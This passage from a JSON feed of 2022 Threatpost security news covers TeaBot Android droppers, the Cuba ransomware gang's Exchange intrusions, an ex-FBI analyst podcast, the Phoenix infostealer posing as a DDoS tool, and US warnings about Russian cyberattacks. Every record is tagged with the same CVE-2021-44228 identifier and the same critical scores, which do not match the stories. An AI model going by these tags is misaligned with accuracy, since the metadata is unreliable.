[discovered](<https://www.cleafy.com/cleafy-labs/teabot-is-now-spreading-across-the-globe>).\n\nThe malware \u2013 designed to intercept SMS messages and login credentials from unwitting users \u2013 affected users of \u201cmore than 400 banking and financial apps, including those from Russia, China, and the U.S,\u201d its report claims.\n\nThis isn\u2019t the first time TeaBot has terrorized Android users.\n\n## TeaBot Just Won\u2019t Die\n\nTeaBot was first [discovered](<https://threatpost.com/threat-actors-androids-flubot-teabot-campaigns/177991/>) last year. It\u2019s a relatively straightforward malware designed to siphon banking, contact, SMS and other types of private data from infected devices. What makes it unique \u2013 what gives it such staying power \u2013 is the clever means by which it spreads.\n\nTeaBot requires no malicious email or text message, no fraudulent website or third-party service. Instead, it typically comes packaged in a dropper application. Droppers are programs that seem legitimate from the outside, but in fact act as vehicles to deliver a second-stage malicious payload.\n\nTeaBot droppers have masked themselves as ordinary QR code or PDF readers. Hank Schless, senior manager of security solutions at Lookout, explained via email that attackers \u201cusually stick to utility apps like QR code scanners, flashlights, photo filters, or PDF scanners because these are apps that people download out of necessity and likely won\u2019t put as much time into looking at reviews that might impact their decision to download.\u201d\n\nThis tactic appears to be effective. In January, an app called QR Code Reader \u2013 Scanner App [was distributing](<https://threatpost.com/fbi-malicious-qr-codes/177902/>) 17 different Teabot variants for a little over a month. 
It managed to pull in more than 100,000 downloads by the time it was discovered.\n\nOther TeaBot droppers \u2013 [discovered](<https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html>) by Dutch security firm ThreatFabric last November \u2013 have been packaged under many names, such as QR Scanner 2021, PDF Document Scanner and CryptoTracker. The latest, [according](<https://www.cleafy.com/cleafy-labs/teabot-is-now-spreading-across-the-globe>) to security firm Cleafy, was QR Code & Barcode \u2013 Scanner.\n\n## Why Can\u2019t TeaBot Be Stopped?\n\nApp stores have [policies](<https://www.google.com/about/unwanted-software-policy.html>) and protections aimed at combating malware. Google Play Protect, for example, helps [root out](<https://support.google.com/googleplay/answer/2812853?hl=en>) malicious apps before they\u2019re installed and [scans](<https://developers.google.com/android/play-protect/client-protections>) for evidence of misdoing on a daily basis.\n\nHowever, TeaBot droppers aren\u2019t obviously malicious. They might seem perfectly uninteresting, at least on the surface.\n\nOnce a user opens one of these nondescript apps, they\u2019re prompted to download a software update. The update is, in fact, a second app containing a malicious payload.\n\nIf the user gives their app permission to install software from an unknown source, the infection process begins. Like other Android malware, the TeaBot malware attempts to leverage Accessibility Services. 
[Such attacks](<https://threatpost.com/alien-android-2fa/159517/>) use an advanced remote access feature that abuses the TeamViewer application \u2013 a remote access and desktop sharing tool \u2013 giving the bad actor behind the malware remote control over the victim\u2019s devices.\n\nThe ultimate goal of these attacks is to retrieve sensitive information such as login credentials, SMS and 2FA codes from the device\u2019s screen, as well as to perform malicious actions on the device, the report said.\n\n## Here\u2019s How TeaBot _Can_ Be Stopped\n\nTeaBot attacks have grown fast. As Cleafy notes, \u201cIn less than a year, the number of applications targeted by TeaBot have grown more than 500%, going from 60 targets to over 400.\u201d\n\nWhat can be done to stop them?\n\n\u201cReal-time scanning of app downloads \u2013 even if the app doesn\u2019t originate from Google Play \u2013 would help to mitigate this issue,\u201d Shawn Smith, director of infrastructure at nVisium, told Threatpost on Wednesday via email, adding that \u201cadditional warning messages when installing app add-ons that aren\u2019t on Google Play could be useful, too.\u201d\n\nLeo Pate, managing consultant at nVisium, also told Threatpost via email on Wednesday that \u201cGoogle could be implementing checks on permissive permissions for applications to run, obtaining lists of specific hardcoded public IPs and domain names. Then, [Google could run] them through various sources to see if they\u2019re \u2018bad.'\u201d\n\nUntil app stores have fixed the problem with droppers, users will have to remain alert, Schless noted. \u201cEveryone knows that they should have antivirus and anti-malware apps on their computers, and our mobile devices shouldn\u2019t be treated any differently.\u201d\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-02T22:50:09", "type": "threatpost", "title": "TeaBot Trojan Haunts Google Play Store, Again", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-02T22:50:09", "id": "THREATPOST:FE7B13B35ED49736C88C39D5279FA3D1", "href": "https://threatpost.com/teabot-trojan-haunts-google-play-store/178738/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-25T20:31:43", "description": "The ransomware gang known as \u201cCuba\u201d is increasingly shifting to exploiting Microsoft Exchange vulnerabilities \u2013 including [ProxyShell](<https://threatpost.com/proxyshell-attacks-unpatched-exchange-servers/168879/>) and 
[ProxyLogon](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) \u2013 as initial infection vectors, researchers have found.\n\nThe group has likely been prying open these chinks in victims\u2019 armor as early as last August, Mandiant [reported](<https://www.mandiant.com/resources/unc2596-cuba-ransomware>) on Wednesday.\n\nMandiant, which tracks the threat actor as UNC2596, noted that the group deploys the COLDDRAW ransomware. In fact, Cuba may be the only group that uses COLDDRAW: At least, it\u2019s the only threat actor using it among those tracked by Mandiant, \u201cwhich may suggest it\u2019s exclusively used by the group,\u201d researchers said.\n\n## Cuba Has Rated an FBI Warning\n\nIn a December [flash alert](<https://www.ic3.gov/Media/News/2021/211203-2.pdf>), the FBI [attributed](<https://threatpost.com/cuba-ransomware-gang-44m-payouts/176790/>) a spate of attacks \u2013 on at least 49 U.S. entities in the financial, government, healthcare, manufacturing and information-technology sectors \u2013 to the group. For what it\u2019s worth, Mandiant hasn\u2019t seen Cuba attacking hospitals or other entities that provide urgent care.\n\nAt the time, the FBI noted that the Cuba ransomware is distributed using a first-stage implant that acts as a loader for follow-on payloads: the Hancitor malware, which has been around for [at least five years](<https://threatpost.com/hancitor-downloader-shifts-attack-strategy/120040/>).\n\nThis isn\u2019t the first time that Cuba has shown a taste for [Exchange vulnerabilities](<https://threatpost.com/tortilla-exchange-servers-proxyshell/175967/>), either. 
They\u2019re just one way that Hancitor operators gain initial access to target machines: Other avenues include phishing emails, and the exploitation of compromised credentials or legitimate Remote Desktop Protocol (RDP) tools, according to the FBI\u2019s December alert.\n\n## Microsoft Exchange Action\n\nTrue to form, Mandiant observed the group \u201cfrequently\u201d picking apart vulnerabilities on public-facing Microsoft Exchange infrastructure as an initial compromise vector. \u201cThe threat actors likely perform initial reconnaissance activities to identify internet-facing systems that may be vulnerable to exploitation,\u201d researchers said.\n\nNext, Cuba deployed webshells to establish a foothold in the compromised network. Then, the actors planted backdoors to establish a foothold, including the publicly available NetSupport RAT, as well as BEACON and BUGHATCH, which have been deployed using the TERMITE in-memory dropper.\n\nThe operators have mainly used credentials from valid accounts to escalate privileges, researchers noted. It\u2019s not always clear where they got the credentials from, but at least in some cases, they were stolen with credential-stealing tools such as Mimikatz and WICKER.\n\n\u201cWe have also observed these threat actors manipulating or creating Windows accounts and modifying file access permissions,\u201d researchers added. In one intrusion, the threat actor created a user account and added it to the admin and RDP groups, they said.\n\n## Infection Chain\n\nIn order to identify active network hosts to potentially encrypt and files to exfiltrate, Cuba has used WEDGECUT, a reconnaissance tool, which sends PING requests to a list of hosts generated by a PowerShell script that enumerates the Active Directory.\n\nThen, the crooks peek around to see what files might be of interest. 
They also routinely use a script to map all drives to network shares, \u201cwhich may assist in user file discovery,\u201d researchers noted.\n\nCuba threat actors have used several methods for lateral movement, including RDP, SMB, and PsExec, \u201cfrequently using BEACON to facilitate this movement,\u201d Mandiant said. Then they deploy various backdoors, including NetSupport, as well as BEACON and BUGHATCH, which are often deployed using the TERMITE in-memory dropper.\n\nTo finish up their extortion work, the gang tries to steal files and encrypt networked machines, threatening to publish to the shaming site exfiltrated data belonging to organizations that balk at paying ransom.\n\n## More Tools, More Malware\n\nAccording to Mandiant\u2019s report, Cuba is using webshells to load the TERMITE dropper: a password-protected, memory-only dropper with an encrypted shellcode payload. The payloads have included BEACON malware, the Metasploit stager or the group\u2019s custom BUGHATCH downloader.\n\nCuba isn\u2019t the only threat actor using the TERMITE dropper: Mandiant said that it\u2019s apparently used by \u201ca limited number\u201d of threat actors.\n\nOver the course of six months, collected TERMITE payloads show that its keepers have been grooming TERMITE, tweaking it so as to better burrow in and evade detections, researchers said.\n\n## Custom-Rolled Malware & Tools\n\nBeyond common, mainstay malware tools such as Cobalt Strike and [NetSupport](<https://malwiki.org/index.php?title=NetSupport_Manager>), Mandiant\u2019s analysis showed that Cuba has some novel malware up its sleeve, including:\n\n**BURNTCIGAR**: a utility that terminates endpoint security software.\n\n**WEDGECUT**: a reconnaissance tool that checks to see whether a list of hosts or IP addresses are online.\n\n**BUGHATCH**: a custom downloader that receives commands and code from a command-and-control (C2) server to execute on a compromised system.\n\nThe researchers noted that when COLDDRAW was 
deployed, Cuba used what they called \u201ca multi-faceted extortion model\u201d \u2013 i.e., besides encrypting data, the gang leaked it on the group\u2019s shaming site, which is depicted below in all its cigar-chomping glory.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/25121905/Cuba-ransomware-shaming-site-e1645809565513.png>)\n\nCuba ransomware\u2019s shaming site. Source: Mandiant.\n\n## Who Does Cuba Love the Best?\n\nThe majority \u2013 80 percent \u2013 of organizations victimized by Cuba are based in North America, but Cuba loves the United States more than anywhere. As shown by the victim map below, the United States is Cuba\u2019s favorite target, followed by Canada, though the group does go after European countries and other regions.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/25122040/cuba-ransomware-victims-per-country-e1645809655324.png>)\n\nCuba ransomware victims by country. Source: Mandiant.\n\nIts favorite industry sector to pick on is manufacturing, followed by financial services.\n\nWith regards to the victims listed on its shaming site \u2013 which the gang has had up since only early 2021 \u2013 Cuba provides a victim list for free, but it also keeps a separate list that you have to pay to see. Mandiant bit the bullet and sprang for that paid section.\n\nIt was sparse, to say the least: \u201c[The] paid section \u2026 listed only a single victim at the time of publication,\u201d its report said.\n\n**_Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-25T19:46:57", "type": "threatpost", "title": "Microsoft Exchange Server Bugs Exploited by 'Cuba' Ransomware Gang", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-25T19:46:57", "id": "THREATPOST:09118C676E28AC5D7BB791E76F75453C", "href": "https://threatpost.com/microsoft-exchange-exploited-cuba-ransomware/178665/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-09T14:11:27", "description": "Crooks are crooks, right?\n\nWhatever motivates serial violent offenders doesn\u2019t switch off when they stop mugging people and instead pick up a keyboard to 
transform into cyber actors who craft cyber threats.\n\nAt least, that was the thinking behind the 2012 creation of the FBI\u2019s Cyber Behavioral Analysis Center (CBAC).\n\n\u201cBehavioral characteristics and motivations of cybercriminals in the real world and virtual world are the same,\u201d said Crane Hassold, who helped to create the CBAC after spending more than 11 years as an FBI analyst, offering strategic and tactical analytical support to cyber, financial crime and violent crime cases. \u201cThe only thing that differentiates them is their choice to use a computer to facilitate a crime.\u201d\n\nDuring his stint at the FBI, Hassold researched a slew of cyber threat flavors: malware, network intrusions, denial-of-service attacks, botnets, phishing and hacktivism. He also served as a subject matter expert who trained others on collecting and analyzing open-source intelligence (OSINT) to identify investigative leads and adversary attribution. As well, Hassold spent his days scouring digital evidence to identify behavioral artifacts and investigative leads and reverse-engineering malicious code to better understand adversary motivations and tactics.\n\nNow, he\u2019s director of threat intelligence at cloud-native email security platform Abnormal Security.\n\nAfter having honed his skills in the behavioral analysis unit, Hassold now goes undercover to connect with attackers directly, unfettered by the red tape of working at a law enforcement agency.\n\nHe\u2019s got some interesting stories: stories about looking at cyber threats at a more human level, about delving into more than the tools, techniques and procedures (TTPs) \u2013 all those technical bells and whistles of cybercrime.\n\nHassold visited the Threatpost podcast recently to share his stories about using the concepts built by the FBI to understand how criminals exploit victims\u2019 behavior in [business email compromise (BEC)](<https://threatpost.com/bec-losses-top-18b/167148/>), about engaging 
with BEC actors (first covertly and then overtly), and more. As well, he shared some key findings from Abnormal\u2019s recent [report](<https://abnormalsecurity.com/resources/ransomware-victims-threat-actors>) about ransomware.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/MULTITRACK_MIXDOWN_020822_Crane_Hassold_Abnormal_Security.mp3>). For more podcasts, check out [Threatpost\u2019s podcast site](<https://threatpost.com/category/podcasts/>).\n\n(Brought to you by [Specops Technology](<http://www.specopssoft.com/threatpost>). _Underwriters of Threatpost podcasts do not assert any editorial control over content._)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-09T14:00:57", "type": "threatpost", "title": "Ex-Gumshoe Nabs Cybercrooks with FBI Tactics", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 
["CVE-2021-44228"], "modified": "2022-02-09T14:00:57", "id": "THREATPOST:B796D491D9E59A6CE14A74FFE427D175", "href": "https://threatpost.com/gumshoe-nabs-cybercrooks-fbi-tactics/178298/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-11T14:53:17", "description": "Looking to cyber-hassle Russia, Ukrainian sympathizers? Be careful \u2014 malware is making the rounds, disguised as a pro-Ukraine cyber-tool that will turn around and bite you instead, researchers are warning.\n\nIn a Wednesday [threat advisory](<https://blog.talosintelligence.com/2022/03/threat-advisory-cybercriminals.html>), Cisco Talos described a campaign it\u2019s observed in which a threat actor was offering a supposed distributed denial-of-service (DDoS) tool on Telegram that\u2019s purportedly meant to pummel Russian websites.\n\nIn truth, the file is actually the Phoenix infostealer that\u2019s after credentials and cryptocurrency info, according to researchers.\n\n[Phoenix](<https://socprime.com/news/phoenix-malware-evolves-from-keylogger-to-infostealer/>) is a keylogger that emerged in the summer of 2019 and which had, within months, turned into a full-fledged infostealer with powerful anti-detection and anti-analysis modules.\n\nResearchers shared one such Telegram come-on, shown below:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/10114749/infostealer-disguised-as-Russian-attack-tool-e1646930888523.jpg>)\n\nInfostealer disguised as a Russian attack tool on Telegram. 
Source: Cisco Talos.\n\n\u201cWe are glad to remind you about the software we use to attack Russian sites!\u201d the message burbled, waiting to jump on unsuspecting users so as to bleed them of cryptocurrency stored in wallets and MetaMask (a cryptocurrency wallet software commonly associated with non-fungible tokens [NFTs]).\n\n## Cyber-Warzone Flooded with New Threats, Hacker Newbies\n\nThe malware dressed in sheep\u2019s clothing is just one more wrinkle in the cyber-threat landscape \u2013 a landscape that has been undergoing seismic shifts leading up to and during Russia\u2019s invasion of Ukraine. The crisis has brought both new threats and an influx of actors \u201cof varying skill,\u201d Cisco said.\n\nFor example, the cyber-warzone has entailed the Conti ransomware gang\u2019s secrets [getting spilled](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) (including a [decryptor and TrickBot code](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>)) by a Ukrainian security researcher (per [KrebsOnSecurity](<https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-i-evasion/>), citing Alex Holden, the Ukrainian-born founder of the Milwaukee-based cyber intelligence firm Hold Security), a pro-Ukrainian member; furious phishing campaigns [launched](<https://threatpost.com/russian-apts-phishing-ukraine-google/178819/>) against Ukraine and [those aiding](<https://threatpost.com/phishing-campaign-targeted-those-aiding-ukraine-refugees/178752/>) Ukrainian refugees; the novel FoxBlade [trojan](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>); DDoS [attacks](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>) against Ukraine\u2019s military and economy; campaigns using multiple destructive [wipers](<https://threatpost.com/destructive-wiper-ukraine/177768/>); hackers affiliating themselves with 
the Anonymous collective [hijacking](<https://www.taiwannews.com.tw/en/news/4466470>) Russian cameras; and more.\n\n\u201cMany of these changes have been brought about by the rise in attacks being[ outsourced](<https://twitter.com/FedorovMykhailo/status/1497642156076511233>) to sympathetic people on the internet, which brings about its own unique challenges and threats,\u201d Cisco [outlined](<https://blog.talosintelligence.com/2022/03/ukraine-update.html>). The threat advisory referenced a [tweet](<https://twitter.com/FedorovMykhailo/status/1497642156076511233>) exhorting people to join an IT army to fight on the cyber-front.\n\n> We are creating an IT army. We need digital talents. All operational tasks will be given here: <https://t.co/Ie4ESfxoSn>. There will be tasks for everyone. We continue to fight on the cyber front. The first task is on the channel for cyber specialists.\n> \n> \u2014 Mykhailo Fedorov (@FedorovMykhailo) [February 26, 2022](<https://twitter.com/FedorovMykhailo/status/1497642156076511233?ref_src=twsrc%5Etfw>)\n\nSoldiers on the frontlines get shot at, of course, and soldiers on the cyber-frontlines run the risk of getting arrested. After all, no matter how noble the hacking cause, it\u2019s still potentially illegal, Cisco pointed out.\n\n## \u2018Legitimate\u2019 Disbalancer Liberator DDoS Tool\n\nThe malware in the Telegram message brands itself as a \u201cDisbalancer\u201d .ZIP file. 
There is, in fact, a group called \u201cdisBalancer\u201d that distributes a \u201clegitimate\u201d DDoS attack tool called, ironically enough, Liberator, Cisco found \u2013 a tool for waging cyberwar against \u201cRussian propaganda websites.\u201d\n\n\u201cA quick look at disBalancer\u2019s website shows that the actor uses similar language to the malicious message on Telegram\u2026and promises to target Russian sites with the stated goal of helping to \u2018liberate\u2019 Ukraine,\u201d according to Cisco\u2019s writeup.\n\nThe security company offered a screenshot of the brandjacking Disbalancer Liberator website, shown below. As Cisco pointed out, there\u2019s a typo in the group\u2019s name, which is rendered as \u201cdisBalancher.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/10135135/Disbalancer-Liberator-e1646938312137.png>)\n\nScreenshot from Disbalancer Liberator website. Source: Cisco Talos.\n\ndisBalancer\u2019s tool \u2013 Disbalancer.exe \u2013 is sincerely meant to DDoS Russia. The infostealer campaign, on the other hand, is based on a dropper disguised as that tool. It\u2019s protected with ASProtect, Cisco said, a known packer for Windows executables.\n\n\u201cIf a researcher tries to debug the malware execution, it will be confronted with a general error. The malware, after performing the anti-debug checks, will launch Regsvcs.exe, which is included along with the .NET framework,\u201d according to the writeup. \u201cIn this case, the regsvcs.exe is not used as a living off the land binary (LoLBin). It is injected with the malicious code, which consists of the Phoenix information stealer.\u201d\n\nThe actors behind this campaign aren\u2019t the newbies flocking to the front lines. 
Rather, they\u2019ve been distributing infostealers since at least November, Cisco said, as evidenced by the fact that the infostealer exfiltrates stolen info to a remote IP address \u2013 in this case, a Russian IP \u2014 95[.]142.46.35 \u2014 on port 6666.\n\nThat IP/port pair \u201chas been distributing infostealers since at least November 2021,\u201d researchers said. The longevity of the pairing reinforces researchers\u2019 belief that these are experienced actors at work, taking advantage of the Ukraine calamity, rather than threat actors new to the scene.\n\nThe infostealer is hoovering up a broad array of information, Cisco said. \u201cThe .ZIP file provided in the Telegram channel contains an executable, which is the infostealer,\u201d according to the report. \u201cThe infostealer gathers information from a variety of sources, including web browsers like Firefox and Chrome and other locations on the filesystem for key pieces of information.\u201d\n\nThe researchers provided a deobfuscated screen capture, replicated below, showing how the pilfered info is sent with a simple base64 encoding. The screen grab shows the breadth of information being pulled off of infected systems, including a large number of crypto wallets and information on MetaMask. \u201cA .ZIP file of the stolen data is also uploaded to the server, completing the compromise,\u201d Cisco said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/10142913/Sample-data-exfiltrated-by-infostealer-e1646940569947.png>)\n\nSample data exfiltrated to server. Source: Cisco Talos.\n\n## Don\u2019t Eat That: You Don\u2019t Know Where It\u2019s Been\n\nThe infostealer masquerading as a DDoS tool to attack Russian targets is just one example of the many ways cybercriminals are milking the invasion for social-engineering sustenance, exploiting sympathizers on both sides. 
\u201cSuch activity could take the form of themed email lures on news topics or donation solicitations, malicious links purporting to host relief funds or refugee support sites, malware masquerading as security defensive or offensive tools, and more,\u201d researchers suggested.\n\nIn this case, cybercriminals were distributing an infostealer in an apparently profit-motivated campaign. It could have been worse, though, according to the report: \u201cIt could have just as easily been a more sophisticated state-sponsored actor or privateer group doing work on behalf of a nation-state.\u201d\n\nExpect this type of situational exploitation to continue and to diversify, Cisco predicted: \u201cThe global interest in the conflict creates a massive potential victim pool for threat actors and also contributes to a growing number of people interested in carrying out their own offensive cyber operations.\u201d\n\nCisco reminded users to essentially avoid eating food that\u2019s been dropped on the floor. You don\u2019t know where that stuff\u2019s been, researchers warned, so be wary of installing software \u201cwhose origins are unknown, especially software that is being dropped into random chat rooms on the internet.\u201d\n\nAs always, carefully inspect suspicious emails before opening attachments, Cisco advised, and validate software or other files before downloading.\n\n031122 0934 UPDATE: Corrected identification of Conti leaker.\n
", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-10T19:54:00", "type": "threatpost", "title": "Malware Posing as Russia DDoS Tool Bites Pro-Ukraine Hackers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-10T19:54:00", "id": "THREATPOST:F72FDE7CB5D697EFD089937D42475E50", "href": "https://threatpost.com/malware-posing-russia-ddos-tool-bites-pro-ukraine-hackers/178864/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-22T16:34:37", "description": "The Russian government is exploring \u201coptions for potential cyberattacks\u201d on critical infrastructure in the U.S., the White House warned on Monday, in 
retaliation for sanctions and other punishments as the war in Ukraine grinds on.\n\nOfficials said that the latest intelligence shows cyber-related \u201cpreparatory activity\u201d on the part of President Vladimir Putin\u2019s government, though White House deputy national security adviser for cyber and emerging technology Anne Neuberger emphasized that no concrete threat has been identified.\n\n\u201cTo be clear, there is no certainty there will be a cyber-incident on critical infrastructure,\u201d she told reporters [during a briefing](<https://thehill.com/homenews/administration/599072-white-house-warns-russia-prepping-possible-cyberattacks-on-us?rl=1>). She added, \u201cThere is no evidence of any specific cyberattack that we are anticipating. There is some preparatory activity that we\u2019re seeing and that is what we shared in a classified context with companies who we thought might be affected.\u201d\n\nThat observed prep work includes vulnerability scanning and website probing, she added, declining to add any specifics. 
She noted that officials were holding more detailed classified briefings with organizations they believe could be targeted.\n\n\u201cThe current conflict has put cybersecurity initiatives in hyperdrive, and today, industry leaders aren\u2019t just concerned about adversaries breaching critical infrastructure but losing access and control to them,\u201d Saket Modi, co-founder and CEO at Safe Security, said via email.\n\nIn tandem with the briefing, the White House released a cyber-preparedness fact sheet, and President Joe Biden [issued the following statement](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/21/statement-by-president-biden-on-our-nations-cybersecurity/>):\n\n_\u201cI have previously warned about the potential that Russia could conduct malicious cyber activity against the United States, including as a response to the unprecedented economic costs we\u2019ve imposed on Russia alongside our allies and partners. It\u2019s part of Russia\u2019s playbook. Today, my Administration is reiterating those warnings based on evolving intelligence that the Russian Government is exploring options for potential cyberattacks.\u201d_\n\nThe [fact sheet](<https://www.whitehouse.gov/briefing-room/statements-releases/2022/03/21/fact-sheet-act-now-to-protect-against-potential-cyberattacks/>) contains basic advice for hardening cyber-defenses, including employee awareness education; implementing multifactor authentication; keeping patching up-to-date; ensuring backups for data; turning on encryption; red-team exercises; and updating security tools.\n\n\u201cThis is a call to action and a call to responsibility for all of us,\u201d Neuberger said, again citing a \u201cpotential shift in intention\u201d by Russia.\n\n## **Organizations Are Not Prepared for Russian Attacks**\n\nJason Rebholz, CISO at Corvus Insurance, noted that basic cyber-hardening should have begun long ago.\n\n\u201cThe White House\u2019s best practices echo security fundamentals 
\u2013 something every organization should strive for,\u201d he said via email. \u201cFor many organizations, the time to implement was several years ago, as the frequency and severity of attacks began to escalate. Like planting a tree, the best time to secure your organization was ten years ago. The next best time is today. Organizations that have not addressed the key items and hardened their cyber-defenses are at a significantly greater risk of compromise.\u201d\n\nBeyond the basics, there are other challenges in being prepared for an onslaught from Russia\u2019s [considerable cyber-arsenal](<https://threatpost.com/destructive-wiper-organizations-ukraine/178937/>), Modi said.\n\n\u201cWhile governments and businesses have started pivoting towards proactive cybersecurity, it is difficult to do so without addressing the three major challenges in cybersecurity that organizations face,\u201d he explained. \u201cThere are too many cybersecurity products that do not communicate with each other, and this siloed approach leads to managing cybersecurity reactively. Finally, despite increased attention on the need for a better disclosure mechanism of cyberattacks, cybersecurity communication continues to be a challenge since it often lacks a business context.\u201d\n\nMeanwhile, Danny Lopez, CEO at Glasswall, pointed out that the real risk involves zero-day exploits and other unknown threats.\n\n\u201cPutin is playing a long game. War is costly both in terms of human and economic terms. If we see a de-escalation of the situation on the ground, we are likely to see an escalation of cyber warfare,\u201d he told Threatpost. \u201cThere are no patches for [unknown zero-day] and they wreak havoc within hours, whilst the security services and technology industry tries to catch up. 
These are extremely dangerous to governments as well as businesses.\u201d\n\nThe bottom line is that organizations should assume that attacks are imminent, researchers concluded.\n\n\u201cIt is a confusing time that involves two nations that have historically possessed and demonstrated very good skills in the cybersecurity and cybercrime areas,\u201d noted Purandar Das, co-founder and CEO at Sotero, via email. \u201cCountries under duress have and will utilize cyberattacks as a way to retaliate and to get around sanctions. The U.S. being the face of such sanctions and a history of poorly protected infrastructure make it a tempting target. Add all this together and the warnings make a lot of sense.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 